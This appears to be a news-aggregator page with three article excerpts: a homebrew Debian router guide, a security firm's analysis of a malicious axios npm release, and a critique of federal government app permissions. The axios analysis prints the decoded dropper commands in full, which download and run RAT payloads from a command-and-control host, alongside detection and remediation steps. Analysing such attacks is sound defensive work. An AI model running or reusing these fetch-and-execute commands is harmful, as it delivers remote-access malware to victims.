10 interesting stories served every morning and every evening.
I don’t like to cover “current events” very much, but the American government just revealed a truly bewildering policy effectively banning import of new consumer router models. This is ridiculous for many reasons, but if this does indeed come to pass it may be beneficial to learn how to “homebrew” a router.
Fortunately, you can make a router out of basically anything resembling a computer.
I’ve used a linux powered mini-pc as my own router for many years, and have posted a few times before about how to make linux routers and firewalls in that time. It’s been rock solid stable, and the only issue I’ve had over the years was wearing out a $20 mSATA drive. While I use Debian typically, Alpine linux probably works just as well, perhaps better if you’re familiar with it. As long as the device runs Linux well and has a couple USB ports, you’re good to go. Mini-PCs, desktop PCs, SBCs, rackmount servers, old laptops, or purpose built devices will all work.
To be clear, this is not meant to be a practical “solution” to the US policy, it’s to show people a neat “hack” you can do to squeeze more capability out of hardware you might already own, and to demonstrate that there’s nothing special about routers - They’re all just computers after all.
My personal preference is a purpose-made mini PC with a passively cooled design.
However, basically anything will work. It should have two Ethernet interfaces, but a standard USB-Ethernet dongle will also do the trick. It won’t be as reliable as an onboard interface, but will probably be good enough. For example, this janky pile of spare parts can easily push 820-850mbps on the wired LAN and ~300 mbps on the wireless network:
This particular device is a Celeron 3205U dual core running at a blistering 1.5 GHz. Even that measly chip is more than capable of routing an entire house or small business worth of traffic.
Going back even further, this was my setup for the first couple weeks of the fall 2016 semester:
It might be hard to tell what’s going on here by looking, so let me break it down:
* An ExpressCard-PCIe bridge in the ThinkPad’s expansion bay
* A trash-picked no-name Ethernet card in the PCIe slot, missing its mounting bracket
* An ancient Cisco 2960 100 mbit switch, purchased for $10 from my college
* A D-Link router acting as an access point (“as-is” thrift store find with a bad WAN port)
Yes, this is indeed a router! It probably looks like a pile of junk, because it is, but it’s junk that’s perfectly able to perform the job I gave it!
When set up, the system will be configured like this:
Both LAN interfaces will be bridged together, meaning that devices on the wired and wireless networks will be able to communicate normally. If one LAN port isn’t enough, you can plug in as many USB Ethernet dongles as you need and bridge ’em all together. It won’t be quite as fast as a “real” switch, but if you’re looking for performance you might’ve come to the wrong place today.
As mentioned before, this will run Debian as the operating system, and uses very few pieces that don’t come with the base install:
* Any firmware blobs not in the default install
Also, I should mention that I’ll only be setting up IPv4 here. IPv6 works great for stuff like mobile devices, but I still find it too frustrating inside a LAN. Perhaps my brain is too calcified already, but I’ll happily hold out on IPv4 for now.
* If you can, set the device to the lowest clock speed, but disable any power management for USB or PCI devices.
* Find the option like “Restore after AC Power Loss” and turn it ON.
* Some devices won’t properly power up if there’s no display connected. If your device is like this, stick a “dummy dongle” into the HDMI port.
* Lots of hardware will only work correctly with the non-free-firmware repository enabled
Depending on your wireless hardware, you may need to install an additional firmware package.
sudo apt install firmware-iwlwifi
sudo apt install firmware-ath9k-htc
Or if you have something truly ancient like I do:
sudo apt install firmware-atheros
After the initial install is done, there are some additional utilities to install:
sudo apt install bridge-utils hostapd dnsmasq
In terms of software, that’s about all that’s needed. There should be about 250 packages on the system in total.
In modern Linux systems, the network interface names are named based on physical connection and driver type, like enp0s31f6. I find the old format, like ethX much simpler, so each interface gets a persistent name.
For each network interface, create a file at /etc/systemd/network/10-persistent-ethX.link
[Match]
MACAddress=AA:BB:CC:DD:00:11
[Link]
Name=ethX
This uses a USB Wi-Fi dongle to act as an access point, creating a network for other devices to join. This will not work as well as a purpose built device, but it’s better than nothing. I’ve had reasonably good results with this, but I also live in a very small building where I’m rarely more than 10m away from the router. If you rely heavily on your wireless network working properly, try to find a dedicated access point device. An old router, even from over a decade ago, will probably work fine for this by just connecting to its LAN port (not the WAN port!).
To set up the onboard wi-fi network, create a config file at /etc/hostapd/hostapd.conf
interface=wlan0
bridge=br0
hw_mode=g
channel=11
ieee80211d=1
country_code=US
ieee80211n=1
wmm_enabled=1
ssid=My Cool and Creative Wi-Fi Name
auth_algs=1
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=mysecurepassword
By default the hostapd service is not startable, so we unmask it before enabling the service.
sudo systemctl unmask hostapd
sudo systemctl enable –now hostapd
The “outside” interface will be the WAN, and the “inside” will be the LAN. Note that the LAN interface does not get a default gateway.
allow-hotplug eth0
allow-hotplug eth1
auto wlan0
auto br0
iface eth0 inet dhcp
iface br0 inet static
bridge_ports eth1 wlan0
address 192.168.1.1/24
After this step, the device should have a quick reboot. It should come back up nicely. If it doesn’t confirm that the previous steps were done correctly, and check for errors by running journalctl -e -u networking.service
If it all worked correctly, the output of this command should be the same:
$ sudo brctl show br0
bridge name bridge id STP enabled interfaces
br0 8000.xxxxx no eth1
wlan0
Create /etc/sysctl.d/10-forward.conf and add this line to enable IP forwarding:
net.ipv4.ip_forward=1
sudo systemctl restart systemd-sysctl.service
The firewall rules and NAT configuration are both handled by the new netfilter system in Linux. We manage this using nftables.
#!/usr/sbin/nft -f
flush ruleset
table inet filter {
chain input {
type filter hook input priority 0; policy drop;
ct state { established,related } counter accept
ip protocol icmp counter accept
iifname “br0” tcp dport { 22, 53 } counter accept
iifname “br0” udp dport { 53, 67, 68 } counter accept
counter
chain forward {
type filter hook forward priority 0; policy drop;
iifname “eth0” oifname “br0″ ct state { established,related } counter accept
iifname “br0” oifname “eth0″ ct state { new,established,related } counter accept
counter
chain output {
type filter hook output priority 0; policy accept;
counter
table ip nat {
chain postrouting {
type nat hook postrouting priority 100; policy accept;
oifname “eth0” counter masquerade
This performs NAT, denies all inbound traffic from outside the network, and allows the router device to act as a DNS, DHCP, and SSH server (for management). Pretty much a bog standard firewall config.
Enable this for the next boot:
sudo systemctl enable nftables.service
...
Read the original on nbailey.ca »
Hijacked maintainer account used to publish poisoned axios releases including 1.14.1 and 0.30.4. The attacker injected a hidden dependency that drops a cross platform RAT. We are actively investigating and will update this post with a full technical analysis. StepSecurity is hosting a community town hall on this incident on April 1st at 10:00 AM PT - Register Here.On March 31, 2026, StepSecurity identified two malicious versions of the widely used axios HTTP client library published to npm: axios@1.14.1 and axios@0.30.4. Both versions were published using the compromised npm credentials of a lead axios maintainer, bypassing the project’s normal GitHub Actions CI/CD pipeline. The attacker changed the maintainer’s account email to an anonymous ProtonMail address and manually published the poisoned packages via the npm CLI.The malicious versions inject a new dependency, plain-crypto-js@4.2.1, which is never imported anywhere in the axios source code. Its sole purpose is to execute a postinstall script that acts as a cross platform remote access trojan (RAT) dropper, targeting macOS, Windows, and Linux. The dropper contacts a live command and control server and delivers platform specific second stage payloads. After execution, the malware deletes itself and replaces its own package.json with a clean version to evade forensic detection.This was not opportunistic. The malicious dependency was staged 18 hours in advance. Three separate payloads were pre-built for three operating systems. Both release branches were hit within 39 minutes. Every trace was designed to self-destruct. This is among the most operationally sophisticated supply chain attacks ever documented against a top-10 npm package.Neither malicious version contains a single line of malicious code inside axios itself. Instead, both inject a fake dependency, plain-crypto-js@4.2.1, a package that is never imported anywhere in the axios source, whose only purpose is to run a postinstall script that deploys a cross-platform remote access trojan (RAT). The dropper contacts a live command-and-control server, delivers separate second-stage payloads for macOS, Windows, and Linux, then erases itself and replaces its own package.json with a clean decoy, leaving a developer who inspects their node_modules folder after the fact with no indication anything went wrong. If you have installed axios@1.14.1 or axios@0.30.4, assume your system is compromised. These compromises were detected by StepSecurity AI Package Analyst [1][2] and StepSecurity Harden-Runner. We have responsibly disclosed the issue to the project maintainers.StepSecurity Harden-Runner, whose community tier is free for public repos and is used by over 12,000 public repositories, detected the compromised axios package making anomalous outbound connections to the attacker’s C2 domain across multiple open source projects. For example, Harden-Runner flagged the C2 callback to sfrclak.com:8000 during a routine CI run in the backstage repository, one of the most widely used developer portal frameworks. The connection was automatically marked as anomalous because it had never appeared in any prior workflow run. Harden-Runner insights for community tier projects are public by design, allowing anyone to verify the detection: https://app.stepsecurity.io/github/backstage/backstage/actions/runs/23775668703?tab=network-eventsThe attack was pre-staged across roughly 18 hours, with the malicious dependency seeded on npm before the axios releases to avoid “brand-new package” alarms from security scanners:
plain-crypto-js@4.2.0 published by nrwise@proton.me — a clean decoy containing a full copy of the legitimate crypto-js source, no postinstall hook. Its sole purpose is to establish npm publishing history so the package does not appear as a zero-history account during later inspection.
plain-crypto-js@4.2.1 published by nrwise@proton.me — malicious payload added. The postinstall: “node setup.js” hook and obfuscated dropper are introduced.
axios@1.14.1 published by compromised jasonsaayman account (email: ifstap@proton.me) — injects plain-crypto-js@4.2.1 as a runtime dependency, targeting the modern 1.x user base.
axios@0.30.4 published by the same compromised account — identical injection into the legacy 0.x branch, published 39 minutes later to maximize coverage across both release lines.
npm unpublishes axios@1.14.1 and axios@0.30.4. Both versions are removed from the registry and the latest dist-tag reverts to 1.14.0. axios@1.14.1 had been live for approximately 2 hours 53 minutes; axios@0.30.4 for approximately 2 hours 15 minutes. Timestamp is inferred from the axios registry document’s modified field (03:15:30Z) — npm does not expose a dedicated per-version unpublish timestamp in its public API.
npm initiates a security hold on plain-crypto-js, beginning the process of replacing the malicious package with an npm security-holder stub.
npm publishes the security-holder stub plain-crypto-js@0.0.1-security.0 under the npm@npmjs.com account, formally replacing the malicious package on the registry. plain-crypto-js@4.2.1 had been live for approximately 4 hours 27 minutes. Attempting to install any version of plain-crypto-js now returns the security notice.
axios is the most popular HTTP client library in the JavaScript ecosystem. It is used in virtually every Node.js and browser application that makes HTTP requests — from React front-ends to CI/CD tooling to server-side APIs. With over 300 million weekly downloads, a compromise of even a single minor release has an enormous potential blast radius. A developer running a routine npm install or npm update would have no reason to suspect the package was deploying malware.The attacker compromised the jasonsaayman npm account, the primary maintainer of the axios project. The account’s registered email was changed to ifstap@proton.me — an attacker-controlled ProtonMail address. Using this access, the attacker published malicious builds across both the 1.x and 0.x release branches simultaneously, maximizing the number of projects exposed.Both axios@1.14.1 and axios@0.30.4 are recorded in the npm registry as published by jasonsaayman, making them indistinguishable from legitimate releases at a glance.A critical forensic signal is visible in the npm registry metadata. Every legitimate axios 1.x release is published via GitHub Actions with npm’s OIDC Trusted Publisher mechanism, meaning the publish is cryptographically tied to a verified GitHub Actions workflow. axios@1.14.1 breaks that pattern entirely — published manually via a stolen npm access token with no OIDC binding and no gitHead:// axios@1.14.0 — LEGITIMATE
“_npmUser”: {
“name”: “GitHub Actions”,
“email”: “npm-oidc-no-reply@github.com”,
“trustedPublisher”: {
“id”: “github”,
“oidcConfigId”: “oidc:9061ef30-3132-49f4-b28c-9338d192a1a9″
// axios@1.14.1 — MALICIOUS
“_npmUser”: {
“name”: “jasonsaayman”,
“email”: “ifstap@proton.me”
// no trustedPublisher, no gitHead, no corresponding GitHub commit or tag
}There is no commit or tag in the axios GitHub repository that corresponds to 1.14.1. The release exists only on npm. The OIDC token that legitimate releases use is ephemeral and scoped to the specific workflow — it cannot be stolen. The attacker must have obtained a long-lived classic npm access token for the account.Before publishing the backdoored axios releases, the attacker pre-staged a malicious package on npm: plain-crypto-js@4.2.1, published from a separate throwaway account (nrwise, nrwise@proton.me). Note the shared use of ProtonMail across both accounts — a consistent operational pattern for this actor.This package is deliberately designed to look legitimate: Masquerades as crypto-js — the same description (“JavaScript library of crypto standards”), the same author attribution (Evan Vosberg), and the same repository URL pointing to github.com/brix/crypto-js Contains a postinstall hook: “postinstall”: “node setup.js” — executes automatically, without any user action, on every npm install Pre-stages its own evidence destruction — includes a file called package.md, a clean package.json stub (version 4.2.0, no postinstall) ready to overwrite the real manifest after the attack runsThe attacker published axios@1.14.1 and axios@0.30.4 with plain-crypto-js: “^4.2.1” added as a runtime dependency — a package that has never appeared in any legitimate axios release. The diff is surgical: every other dependency is identical to the prior clean version.When a developer runs npm install axios@1.14.1, npm resolves the dependency tree and installs plain-crypto-js@4.2.1 automatically. npm then executes plain-crypto-js’s postinstall script, launching the dropper.Phantom dependency: A grep across all 86 files in axios@1.14.1 confirms that plain-crypto-js is never imported or require()’d anywhere in the axios source code. It is added to package.json only to trigger the postinstall hook. A dependency that appears in the manifest but has zero usage in the codebase is a high-confidence indicator of a compromised release.setup.js is a single minified file employing a two-layer obfuscation scheme designed to evade static analysis tools and confuse human reviewers.All sensitive strings — module names, OS identifiers, shell commands, the C2 URL, and file paths — are stored as encoded values in an array named stq[]. Two functions decode them at runtime:_trans_1(x, r) — XOR cipher. The key “OrDeR_7077″ is parsed through JavaScript’s Number(): alphabetic characters produce NaN, which in bitwise operations becomes 0. Only the digits 7, 0, 7, 7 in positions 6–9 survive, giving an effective key of [0,0,0,0,0,0,7,0,7,7]. Each character at position r is decoded as:charCode XOR key[(7 × r × r) % 10] XOR 333_trans_2(x, r) — Outer layer. Reverses the encoded string, replaces _ with =, base64-decodes the result (interpreting the bytes as UTF-8 to recover Unicode code points), then passes the output through _trans_1.The dropper’s entry point is _entry(“6202033”), where 6202033 is the C2 URL path segment. The full C2 URL is: http://sfrclak.com:8000/6202033StepSecurity fully decoded every entry in the stq[] array. The recovered plaintext reveals the complete attack:stq[0] → “child_process” // shell execution
stq[1] → “os” // platform detection
stq[2] → “fs” // filesystem operations
stq[3] → “http://sfrclak.com:8000/” // C2 base URL
stq[5] → “win32” // Windows platform identifier
stq[6] → “darwin” // macOS platform identifier
stq[12] → “curl -o /tmp/ld.py -d packages.npm.org/product2 -s SCR_LINK && nohup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &”
stq[13] → “package.json” // deleted after execution
stq[14] → “package.md” // clean stub renamed to package.json
stq[15] → ”.exe”
stq[16] → ”.ps1″
stq[17] → ”.vbs”The dropper checks os.platform() and branches into one of three attack paths:On macOS (darwin), the dropper writes an AppleScript file to the system temp directory and executes it silently:nohup osascript “The AppleScript contacts the C2 server with POST body packages.npm.org/product0, downloads the macOS RAT binary, saves it to /Library/Caches/com.apple.act.mond (a path designed to look like a legitimate Apple system cache entry), makes it executable with chmod 770, and launches it in the background via /bin/zsh:do shell script “curl -o /Library/Caches/com.apple.act.mond \
-d packages.npm.org/product0 \
-s http://sfrclak.com:8000/6202033 \
&& chmod 770 /Library/Caches/com.apple.act.mond \
&& /bin/zsh -c "/Library/Caches/com.apple.act.mond hhttp://sfrclak.com:8000/6202033 &" \
&> /dev/null”The AppleScript file is deleted after execution. The only persistent artifact is /Library/Caches/com.apple.act.mond. The path is deliberate: /Library/Caches/ is a system-owned directory rarely inspected during incident response, and the name com.apple.act.mond mimics Apple’s reverse-DNS daemon naming convention — the suffix likely abbreviates “Activity Monitor Daemon” to blend in with legitimate Apple background processes in the same directory.On Windows (win32), the attack chain involves three stages: Run where powershell to locate the PowerShell binary path Copy the PowerShell binary to %PROGRAMDATA%\wt.exe — disguised as the Windows Terminal executable, providing a persistent copy of the interpreter Write a VBScript (.vbs) to the temp directory and execute it via cscript //nologoSet objShell = CreateObject(“WScript.Shell”)
objShell.Run “cmd.exe /c curl -s -X POST ” & _
“-d “”packages.npm.org/product1″” ” & _
″“”http://sfrclak.com:8000/6202033″” > “”The C2 returns a PowerShell RAT script, saved to %TEMP%\6202033.ps1 (using the campaign ID as filename). It runs with -ExecutionPolicy Bypass and -WindowStyle Hidden, then self-deletes. The VBScript (%TEMP%\6202033.vbs) is also deleted by cscript after execution. The only persistent artifact is %PROGRAMDATA%\wt.exe.On all other platforms (Linux, etc.), the dropper executes a direct shell command via Node.js’s execSync:curl -o /tmp/ld.py \
-d packages.npm.org/product2 \
-s http://sfrclak.com:8000/6202033 \
&& nohup python3 /tmp/ld.py http://sfrclak.com:8000/6202033 > /dev/null 2>&1 &The C2 returns a Python RAT script. It is saved to /tmp/ld.py and executed in the background with nohup. The file remains on disk at /tmp/ld.py.Three products, one C2: Each platform sends a distinct POST body to the same C2 URL — packages.npm.org/product0 (macOS), packages.npm.org/product1 (Windows), packages.npm.org/product2 (Linux). This allows the C2 server to serve a platform-appropriate payload in response to a single endpoint. The packages.npm.org/ prefix in the POST body is a deliberate attempt to make outbound traffic appear as benign npm registry communication in network logs and SIEM rules at a glance.After launching the platform payload, setup.js performs three forensic cleanup steps that make standard post-infection analysis unreliable: Deletes itself — fs.unlink(__filename) removes setup.js from the installed package directory Deletes package.json — removes the file that contains the incriminating “postinstall”: “node setup.js” hook Renames package.md to package.json — the pre-staged clean stub (version 4.2.0, no postinstall, no setup.js reference) is moved into placeAny post-infection inspection of node_modules/plain-crypto-js/package.json will show a completely clean manifest. There is no postinstall script, no setup.js file, and no indication that anything malicious was ever installed. Running npm audit or manually reviewing the installed package directory will not reveal the compromise.Why the directory presence still matters: Even after cleanup, the existence of node_modules/plain-crypto-js/ is sufficient evidence of compromise — this package is not a dependency of any legitimate axios version. If you find this directory, the dropper ran.Static analysis of the obfuscated dropper told us what the malware intended to do. To confirm it actually executes as designed, we installed axios@1.14.1 inside a GitHub Actions runner instrumented with StepSecurity Harden-Runner in audit mode. Harden-Runner captures every outbound network connection, every spawned process, and every file write at the kernel level — without interfering with execution in audit mode, giving us a complete ground-truth picture of what happens the moment npm install runs.The full Harden-Runner insights for this run are publicly accessible:
app.stepsecurity.io/github/actions-security-demo/compromised-packages/actions/runs/23776116077The network event log contains two outbound connections to sfrclak.com:8000 — but what makes this particularly significant is when they occur:The first C2 connection (curl, PID 2401) fires 1.1 seconds into the npm install — at 01:30:51Z, just 2 seconds after npm install began at 01:30:49Z. The postinstall hook triggered, decoded its strings, and was making an outbound HTTP connection to an external server before npm had finished resolving all dependencies. The second C2 connection (nohup, PID 2400) occurs 36 seconds later, in an entirely different workflow step — “Verify axios import and version.” The npm install step was long finished. The malware had persisted into subsequent steps, running as a detached background process. This is the stage-2 Python payload (/tmp/ld.py) making a callback — alive and independent of the process that spawned it.Why both connections show calledBy: “infra”: When Harden-Runner can trace a network call to a specific Actions step through the runner process tree, it labels it “runner”. The “infra” label means the process making the connection could not be attributed to a specific step — because the dropper used nohup … & to detach from the process tree. The process was deliberately orphaned to PID 1 (init), severing all parent-child relationships. This is the malware actively evading process attribution.Process Tree: The Full Kill Chain as Observed at RuntimeHarden-Runner captures every execve syscall. The raw process events reconstruct the exact execution chain from npm install to C2 contact:PID 2366 bash /home/runner/work/_temp/***.sh [01:30:48.186Z]
└─ PID 2380 env node npm install axios@1.14.1 [01:30:49.603Z]
└─ PID 2391 sh -c “node setup.js” [01:30:50.954Z]
│ cwd: node_modules/plain-crypto-js ← postinstall hook fires
└─ PID 2392 node setup.js [01:30:50.955Z]
│ cwd: node_modules/plain-crypto-js
└─ PID 2399 /bin/sh -c “curl -o /tmp/ld.py \ [01:30:50.978Z]
-d packages.npm.org/product2 \
-s http://sfrclak.com:8000/6202033 \
&& nohup python3 /tmp/ld.py \
http://sfrclak.com:8000/6202033 \
> /dev/null 2>&1 &”
PID 2401 curl -o /tmp/ld.py -d packages.npm.org/product2 [01:30:50.979Z]
ppid: 2400 ← child of nohup
PID 2400 nohup python3 /tmp/ld.py http://sfrclak.com:8000/6202033 [01:31:27.732Z]
ppid: 1 ← ORPHANED TO INIT — detached from npm process treeThe process tree confirms the exact execution chain decoded statically from setup.js. Four levels of process indirection separate the original npm install from the C2 callback: npm → sh → node → sh → curl/nohup. The nohup process (PID 2400) reporting ppid: 1 is the technical confirmation of the daemonization technique — by the time npm install returned successfully, a detached process was already running /tmp/ld.py in the background.The file event log captures every file write by PID. The plain-crypto-js/package.json entry shows two writes from two different processes — directly confirming the anti-forensics technique described in static analysis:File: node_modules/plain-crypto-js/package.json
Write 1 — pid=2380 (npm install) ts=01:30:50.905Z
Malicious package.json written to disk during install.
Contains: { “postinstall”: “node setup.js” }
Write 2 — pid=2392 (node setup.js) ts=01:31:27.736Z [+36s]
Dropper overwrites package.json with clean stub from package.md.
Contains: version 4.2.0 manifest, no scripts, no postinstall.The 36-second gap between the two writes is the execution time of the dropper — it wrote the second file only after successfully launching the background payload. Harden-Runner flagged this as a “Source Code Overwritten” file integrity event. Post-infection, any tool that reads node_modules/plain-crypto-js/package.json will see the clean manifest. The write event log is the only runtime artifact that proves the swap occurred.
Check for the malicious axios versions in your project:npm list axios 2>/dev/null | grep -E “1\.14\.1|0\.30\.4”
grep -A1 ‘“axios”’ package-lock.json | grep -E “1\.14\.1|0\.30\.4″ls node_modules/plain-crypto-js 2>/dev/null && echo “POTENTIALLY AFFECTED”If setup.js already ran, package.json inside this directory will have been replaced with a clean stub. The presence of the directory is sufficient evidence the dropper executed.# macOS
ls -la /Library/Caches/com.apple.act.mond 2>/dev/null && echo “COMPROMISED”
# Linux
ls -la /tmp/ld.py 2>/dev/null && echo “COMPROMISED”
“COMPROMISED”
# Windows (cmd.exe)
dir “%PROGRAMDATA%\wt.exe” 2>nul && echo COMPROMISEDCheck CI/CD pipeline logs for any npm install executions that may have pulled axios@1.14.1 or axios@0.30.4. Any pipeline that installed either version should be treated as compromised and all injected secrets rotated immediately. Downgrade axios to a clean version and pin it: npm install axios@1.14.0 # for 1.x usersnpm install axios@0.30.3 # for 0.x users
Add an overrides block to prevent transitive resolution back to the malicious versions: { “dependencies”: { “axios”: “1.14.0” }, “overrides”: { “axios”: “1.14.0″ }, “resolutions”: { “axios”: “1.14.0” }} If a RAT artifact is found: treat the system as fully compromised. Do not attempt to clean in place — rebuild from a known-good state. Rotate all credentials on any system where the malicious package ran: npm tokens, AWS access keys, SSH private keys, cloud credentials (GCP, Azure), CI/CD secrets, and any values present in .env files accessible at install time. Audit CI/CD pipelines for runs that installed the affected versions. Any workflow that executed npm install with these versions should have all injected secrets rotated. Use –ignore-scripts in CI/CD as a standing policy to prevent postinstall hooks from running during automated builds:
npm ci –ignore-scripts Block C2 traffic at the network/DNS layer as a precaution on any potentially exposed system:
# Block via firewall (Linux)iptables -A OUTPUT -d 142.11.206.73-j DROP# Block via /etc/hosts (macOS/Linux)echo “0.0.0.0 sfrclak.com” >> /etc/hosts It enforces a network egress allowlist in GitHub Actions, restricting outbound network traffic to only allowed endpoints. Both DNS and network-level enforcement prevent covert data exfiltration. The C2 callback to sfrclak.com:8000 and the payload fetch in the postinstall script would have been blocked at the network level before the RAT could be delivered.Harden-Runner also automatically logs outbound network traffic per job and repository, establishing normal behavior patterns and flagging anomalies. This reveals whether malicious postinstall scripts executed exfiltration attempts or contacted suspicious domains, even when the malware self-deletes its own evidence afterward. The C2 callback to sfrclak.com:8000 was flagged as anomalous because it had never appeared in any prior workflow run.Supply chain attacks like this one do not stop at the CI/CD pipeline. The malicious postinstall script in plain-crypto-js@4.2.1 drops a cross-platform RAT designed to run on the developer’s own machine, harvesting credentials, SSH keys, cloud tokens, and other secrets from the local environment. Every developer who ran npm install with the compromised axios version outside of CI is a potential point of compromise.StepSecurity Dev Machine Guard gives security teams real-time visibility into npm packages installed across every enrolled developer device. When a malicious package is identified, teams can immediately search by package name and version to discover all impacted machines, as shown below with axios@1.14.1 and axios@0.30.4.Newly published npm packages are temporarily blocked during a configurable cooldown window. When a PR introduces or updates to a recently published version, the check automatically fails. Since most malicious packages are identified within 24 hours, this creates a crucial safety buffer. In this case, plain-crypto-js@4.2.1 was published hours before the axios releases, so any PR updating to axios@1.14.1 or axios@0.30.4 during the cooldown period would have been blocked automatically.StepSecurity maintains a real-time database of known malicious and high-risk npm packages, updated continuously, often before official CVEs are filed. If a PR attempts to introduce a compromised package, the check fails and the merge is blocked. Both axios@1.14.1 and plain-crypto-js@4.2.1 were added to this database within minutes of detection.Search across all PRs in all repositories across your organization to find where a specific package was introduced. When a compromised package is discovered, instantly understand the blast radius: which repos, which PRs, and which teams are affected. This works across pull requests, default branches, and dev machines.AI Package Analyst continuously monitors the npm registry for suspicious releases in real time, scoring packages for supply chain risk before you install them. In this case, both axios@1.14.1 and plain-crypto-js@4.2.1 were flagged within minutes of publication, giving teams time to investigate, confirm malicious intent, and act before the packages accumulated significant installs. Alerts include the full behavioral analysis, decoded payload details, and direct links to the OSS Security Feed.StepSecurity has published a threat intel alert in the Threat Center with all relevant links to check if your organization is affected. The alert includes the full attack summary, technical analysis, IOCs, affected versions, and remediation steps, so teams have everything needed to triage and respond immediately. Threat Center alerts are delivered directly into existing SIEM workflows for real-time visibility.We want to thank the axios maintainers and the community members who quickly identified and triaged the compromise in GitHub issue #10604. Their rapid response, collaborative analysis, and clear communication helped the ecosystem understand the threat and take action within hours.We also want to thank GitHub for swiftly suspending the compromised account and npm for quickly unpublishing the malicious axios versions and placing a security hold on plain-crypto-js. The coordinated response across maintainers, GitHub, and npm significantly limited the window of exposure for developers worldwide.Hijacked maintainer account used to publish poisoned axios releases including 1.14.1 and 0.30.4. The attacker injected a hidden dependency that drops a cross platform RAT. We are actively investigating and will update this post with a full technical analysis.TeamPCP weaponized 76 Trivy version tags overnight. The KICS attack followed the same playbook days later. One security control is not enough. Here is how the StepSecurity platform’s ten independent security layers work together to prevent credential exfiltration, detect compromised actions at runtime, and respond to incidents across your entire organization before attackers can succeed.Malicious IoliteLabs VSCode Extensions Target Solidity Developers on Windows, macOS, and Linux with BackdoorA supply chain attack targeting Solidity and Web3 developers has been discovered across three IoliteLabs VSCode extensions (solidity-macos, solidity-windows, and solidity-linux) embedding obfuscated backdoors that download remote payloads and establish persistence on all major platforms. StepSecurity is actively investigating this incident and will publish a full technical analysis with IOCs and remediation guidance shortly.
...
Read the original on www.stepsecurity.io »
The federal government released an app yesterday, March 27th, and it’s spyware.
The White House app markets itself as a way to get “unparalleled access” to the Trump administration, with press releases, livestreams, and policy updates. The kind of content that every RSS feed on the planet delivers with one permission: network access. But the White House app, version 47.0.1 (because subtlety died a long time ago), requests precise GPS location, biometric fingerprint access, storage modification, the ability to run at startup, draw over other apps, view your Wi-Fi connections, and read badge notifications. It also ships with 3 embedded trackers including Huawei Mobile Services Core (yes, the Chinese company the US government sanctioned, shipping tracking infrastructure inside the sitting president’s official app), and it has an ICE tip line button that redirects straight to ICE’s reporting page.
This thing also has a “Text the President” button that auto-fills your message with “Greatest President Ever!” and then collects your name and phone number. There’s no specific privacy policy for the app, just a generic whitehouse.gov policy that doesn’t address any of the app’s tracking capabilities.
The White House app might actually be one of the milder ones. I’ve been going through every federal agency app I can find on Google Play, pulling their permissions from Exodus Privacy (which audits Android APKs for trackers and permissions), and what I found deserves its own term. I’m calling it Fedware.
Ok so let me walk you through what the federal government is running on your phone.
The FBI’s app, myFBI Dashboard, requests 12 permissions including storage modification, Wi-Fi scanning, account discovery (it can see what accounts are on your device), phone state reading, and auto-start at boot. It also contains 4 trackers, one of which is Google AdMob, which means the FBI’s official app ships with an ad-serving SDK while also reading your phone identity. From what I found, the FBI’s news app has more trackers embedded than most weather apps.
The FEMA app requests 28 permissions including precise and approximate location, and has gone from 4 trackers in older versions down to 1 in v3.0.14. Twenty-eight permissions for an app whose primary function is showing you weather alerts and shelter locations. To put that in context, the AP News app delivers the same kind of disaster coverage with a fraction of the permissions.
IRS2Go has 3 trackers and 10 permissions in its latest version, and according to a TIGTA audit, the IRS released this app to the public before the required Privacy Impact Assessment was even signed, which violated OMB Circular A-130. The app shares device IDs, app activity, and crash logs with third parties, and TIGTA found that the IRS never confirmed that filing status and refund amounts were masked and encrypted in the app interface.
MyTSA comes in lighter with 9 permissions and 1 tracker, but still requests precise and approximate location. The TSA’s own Privacy Impact Assessment says the app stores location locally and claims it never transmits GPS data to TSA. I’ll give them credit for documenting that, because most of these apps have privacy policies that read like ransom notes.
CBP Mobile Passport Control is where things get genuinely alarming. This one requests 14 permissions including 7 classified as “dangerous”: background location tracking (it follows you even when the app is closed), camera access, biometric authentication, and full external storage read/write. And the whole CBP ecosystem, from CBP One to CBP Home to Mobile Passport Control, feeds data into a network that retains your faceprints for up to 75 years and shares it across DHS, ICE, and the FBI.
The government also built a facial recognition app called Mobile Fortify that ICE agents carry in the field. It draws from hundreds of millions of images across DHS, FBI, and State Department databases. ICE Homeland Security Investigations signed a $9.2 million contract with Clearview AI in September 2025, giving agents access to over 50 billion facial images scraped from the internet. DHS’s own internal documents admit Mobile Fortify can be used to amass biographical information of “individuals regardless of citizenship or immigration status”, and CBP confirmed it will “retain all photographs” including those of U. S. citizens, for 15 years.
Photos submitted through CBP Home, biometric scans from Mobile Passport Control, and faces captured by Mobile Fortify all feed this system. And the EFF found that ICE does not allow people to opt out of being scanned, and agents can use a facial recognition match to determine your immigration status even when other evidence contradicts it. A U. S.-born citizen was told he could be deported based on a biometric match alone.
SmartLINK is the ICE electronic monitoring app, built by BI Incorporated, a subsidiary of the GEO Group (a private prison company that profits directly from how many people ICE monitors), under a $2.2 billion contract. The app collects geolocation, facial images, voice prints, medical information including pregnancy data, and phone numbers of your contacts. ICE’s contract gives them “unlimited rights to use, dispose of, or disclose” all data collected. The app’s former terms of service allowed sharing “virtually any information collected through the application, even beyond the scope of the monitoring plan.” SmartLINK went from 6,000 users in 2019 to over 230,000 by 2022, and in 2019, ICE used GPS data from these monitors to coordinate one of the largest immigration raids in history, arresting around 700 people across six cities in Mississippi.
And if you think your location data is safe because you use regular apps and avoid government ones, the federal government is buying that data too. Companies like Venntel collect 15 billion location points from over 250 million devices every day through SDKs embedded in over 80,000 apps (weather, navigation, coupons, games). DHS, FBI, DOD, and the DEA purchase this data without warrants, creating a constitutional loophole around the Supreme Court’s 2018 Carpenter v. United States ruling that requires a warrant for cellphone location history. The Defense Department even purchased location data from prayer apps to monitor Muslim communities. Police departments used similar data to track racial justice protesters.
And then there’s the IRS-ICE data sharing deal from April 2025. The IRS and ICE signed a Memorandum of Understanding allowing ICE to receive names, addresses, and tax data for people with removal orders. ICE submitted 1.28 million names. The IRS erroneously shared the data of thousands of people who should never have been included. The acting IRS Commissioner, Melanie Krause, resigned in protest. The chief privacy officer quit. One person leaving changes nothing about the institution, and the data was already out the door. A federal judge blocked further sharing in November 2025, ruling it likely violates IRS confidentiality protections, but by then the IRS was already building an automated system to give ICE bulk access to home addresses with minimal human oversight. The court order is a speed bump, and they’ll find another route.
The apps, the databases, and the data broker contracts all feed the same pipeline, and no single agency controls it because they all share it.
